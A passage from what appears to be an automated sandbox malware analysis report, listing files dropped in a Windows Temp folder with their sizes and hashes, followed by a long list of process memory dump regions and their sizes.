                                                                                        c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\wodhhjan\CSC96BE598F4EEA495AA6644598E23C75A.TMP

                                                                                        Filesize

                                                                                        652B

                                                                                        MD5

                                                                                        73ed79d781b7d8f647dbfc093a4289d9

                                                                                        SHA1

                                                                                        140d7ce2644a5994282b61f331a6d31e5c57b98a

                                                                                        SHA256

                                                                                        f6c1210b223d815594a63d6becb1753b0f6ff81664a079ceee19f831b2590c41

                                                                                        SHA512

                                                                                        2acf71ef83d04fa5b8eb93a686a3223d13b172f44aa3e245cffe9ca2402d6c67b28976e83ad0d02f9aef158a4fb91f4b79f931c9daac66262f278225aa95bd44

                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\wodhhjan\wodhhjan.0.cs

                                                                                        Filesize

                                                                                        1004B

                                                                                        MD5

                                                                                        c76055a0388b713a1eabe16130684dc3

                                                                                        SHA1

                                                                                        ee11e84cf41d8a43340f7102e17660072906c402

                                                                                        SHA256

                                                                                        8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                        SHA512

                                                                                        22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\wodhhjan\wodhhjan.cmdline

                                                                                        Filesize

                                                                                        607B

                                                                                        MD5

                                                                                        d1fcfc852c4effc3cf890735c03bdaa4

                                                                                        SHA1

                                                                                        c5cb7d180fac8e2e1734247ad18e823e8c8e4f9f

                                                                                        SHA256

                                                                                        bc2d1e4efa237f23aa0f30616ff3470737a4efdd5700c8bc5e0c9718ba655396

                                                                                        SHA512

                                                                                        a244b2b104367d193d34cfa4e47f257ed73a06bc5f1a6def28d8b88313641e645b3e61389481f1c589477fbcef6dba959b7ba581522eb09bd18be4c000602569

                                                                                      • memory/1256-188-0x00000232FD970000-0x00000232FD978000-memory.dmp

                                                                                        Filesize

                                                                                        32KB

                                                                                      • memory/2164-91-0x000001A9828B0000-0x000001A9828D2000-memory.dmp

                                                                                        Filesize

                                                                                        136KB

                                                                                      • memory/3140-30-0x00007FFDD12B0000-0x00007FFDD12D4000-memory.dmp

                                                                                        Filesize

                                                                                        144KB

                                                                                      • memory/3140-157-0x00007FFDD1230000-0x00007FFDD1249000-memory.dmp

                                                                                        Filesize

                                                                                        100KB

                                                                                      • memory/3140-109-0x00007FFDCCC20000-0x00007FFDCCD91000-memory.dmp

                                                                                        Filesize

                                                                                        1.4MB

                                                                                      • memory/3140-106-0x00007FFDD2140000-0x00007FFDD215E000-memory.dmp

                                                                                        Filesize

                                                                                        120KB

                                                                                      • memory/3140-81-0x00007FFDBD180000-0x00007FFDBD298000-memory.dmp

                                                                                        Filesize

                                                                                        1.1MB

                                                                                      • memory/3140-80-0x00007FFDD3FD0000-0x00007FFDD3FE8000-memory.dmp

                                                                                        Filesize

                                                                                        96KB

                                                                                      • memory/3140-77-0x00007FFDCCB70000-0x00007FFDCCB85000-memory.dmp

                                                                                        Filesize

                                                                                        84KB

                                                                                      • memory/3140-78-0x00007FFDCCA10000-0x00007FFDCCA1D000-memory.dmp

                                                                                        Filesize

                                                                                        52KB

                                                                                      • memory/3140-70-0x00007FFDCC390000-0x00007FFDCC7F5000-memory.dmp

                                                                                        Filesize

                                                                                        4.4MB

                                                                                      • memory/3140-71-0x00007FFDCCA20000-0x00007FFDCCAD7000-memory.dmp

                                                                                        Filesize

                                                                                        732KB

                                                                                      • memory/3140-252-0x00000209ECD30000-0x00000209ED0A7000-memory.dmp

                                                                                        Filesize

                                                                                        3.5MB

                                                                                      • memory/3140-251-0x00007FFDCCFD0000-0x00007FFDCCFFE000-memory.dmp

                                                                                        Filesize

                                                                                        184KB

                                                                                      • memory/3140-256-0x00007FFDCCA20000-0x00007FFDCCAD7000-memory.dmp

                                                                                        Filesize

                                                                                        732KB

                                                                                      • memory/3140-72-0x00000209ECD30000-0x00000209ED0A7000-memory.dmp

                                                                                        Filesize

                                                                                        3.5MB

                                                                                      • memory/3140-73-0x00007FFDBD550000-0x00007FFDBD8C7000-memory.dmp

                                                                                        Filesize

                                                                                        3.5MB

                                                                                      • memory/3140-74-0x00007FFDD12B0000-0x00007FFDD12D4000-memory.dmp

                                                                                        Filesize

                                                                                        144KB

                                                                                      • memory/3140-66-0x00007FFDCCFD0000-0x00007FFDCCFFE000-memory.dmp

                                                                                        Filesize

                                                                                        184KB

                                                                                      • memory/3140-62-0x00007FFDD1230000-0x00007FFDD1249000-memory.dmp

                                                                                        Filesize

                                                                                        100KB

                                                                                      • memory/3140-64-0x00007FFDD5AB0000-0x00007FFDD5ABD000-memory.dmp

                                                                                        Filesize

                                                                                        52KB

                                                                                      • memory/3140-56-0x00007FFDD3FD0000-0x00007FFDD3FE8000-memory.dmp

                                                                                        Filesize

                                                                                        96KB

                                                                                      • memory/3140-58-0x00007FFDD2140000-0x00007FFDD215E000-memory.dmp

                                                                                        Filesize

                                                                                        120KB

                                                                                      • memory/3140-60-0x00007FFDCCC20000-0x00007FFDCCD91000-memory.dmp

                                                                                        Filesize

                                                                                        1.4MB

                                                                                      • memory/3140-54-0x00007FFDCD000000-0x00007FFDCD02C000-memory.dmp

                                                                                        Filesize

                                                                                        176KB

                                                                                      • memory/3140-32-0x00007FFDD5AC0000-0x00007FFDD5ACF000-memory.dmp

                                                                                        Filesize

                                                                                        60KB

                                                                                      • memory/3140-25-0x00007FFDCC390000-0x00007FFDCC7F5000-memory.dmp

                                                                                        Filesize

                                                                                        4.4MB

                                                                                      • memory/3140-270-0x00007FFDBD550000-0x00007FFDBD8C7000-memory.dmp

                                                                                        Filesize

                                                                                        3.5MB

                                                                                      • memory/3140-305-0x00007FFDBD180000-0x00007FFDBD298000-memory.dmp

                                                                                        Filesize

                                                                                        1.1MB

                                                                                      • memory/3140-291-0x00007FFDCC390000-0x00007FFDCC7F5000-memory.dmp

                                                                                        Filesize

                                                                                        4.4MB

                                                                                      • memory/3140-297-0x00007FFDCCC20000-0x00007FFDCCD91000-memory.dmp

                                                                                        Filesize

                                                                                        1.4MB

                                                                                      • memory/3140-296-0x00007FFDD2140000-0x00007FFDD215E000-memory.dmp

                                                                                        Filesize

                                                                                        120KB

                                                                                      • memory/3140-292-0x00007FFDD12B0000-0x00007FFDD12D4000-memory.dmp

                                                                                        Filesize

                                                                                        144KB

                                                                                      • memory/3140-306-0x00007FFDCC390000-0x00007FFDCC7F5000-memory.dmp

                                                                                        Filesize

                                                                                        4.4MB

                                                                                      • memory/3140-333-0x00007FFDCCB70000-0x00007FFDCCB85000-memory.dmp

                                                                                        Filesize

                                                                                        84KB

                                                                                      • memory/3140-341-0x00007FFDD2140000-0x00007FFDD215E000-memory.dmp

                                                                                        Filesize

                                                                                        120KB

                                                                                      • memory/3140-347-0x00007FFDCCA10000-0x00007FFDCCA1D000-memory.dmp

                                                                                        Filesize

                                                                                        52KB

                                                                                      • memory/3140-346-0x00007FFDCCA20000-0x00007FFDCCAD7000-memory.dmp

                                                                                        Filesize

                                                                                        732KB

                                                                                      • memory/3140-345-0x00007FFDCCFD0000-0x00007FFDCCFFE000-memory.dmp

                                                                                        Filesize

                                                                                        184KB

                                                                                      • memory/3140-344-0x00007FFDD5AB0000-0x00007FFDD5ABD000-memory.dmp

                                                                                        Filesize

                                                                                        52KB

                                                                                      • memory/3140-343-0x00007FFDD1230000-0x00007FFDD1249000-memory.dmp

                                                                                        Filesize

                                                                                        100KB

                                                                                      • memory/3140-342-0x00007FFDCCC20000-0x00007FFDCCD91000-memory.dmp

                                                                                        Filesize

                                                                                        1.4MB

                                                                                      • memory/3140-340-0x00007FFDD3FD0000-0x00007FFDD3FE8000-memory.dmp

                                                                                        Filesize

                                                                                        96KB

                                                                                      • memory/3140-339-0x00007FFDCD000000-0x00007FFDCD02C000-memory.dmp

                                                                                        Filesize

                                                                                        176KB

                                                                                      • memory/3140-338-0x00007FFDD5AC0000-0x00007FFDD5ACF000-memory.dmp

                                                                                        Filesize

                                                                                        60KB

                                                                                      • memory/3140-337-0x00007FFDD12B0000-0x00007FFDD12D4000-memory.dmp

                                                                                        Filesize

                                                                                        144KB

                                                                                      • memory/3140-336-0x00007FFDBD550000-0x00007FFDBD8C7000-memory.dmp

                                                                                        Filesize

                                                                                        3.5MB

                                                                                      • memory/3140-335-0x00007FFDBD180000-0x00007FFDBD298000-memory.dmp

                                                                                        Filesize

                                                                                        1.1MB

                                                                                      • memory/3140-321-0x00007FFDCC390000-0x00007FFDCC7F5000-memory.dmp

                                                                                        Filesize

                                                                                        4.4MB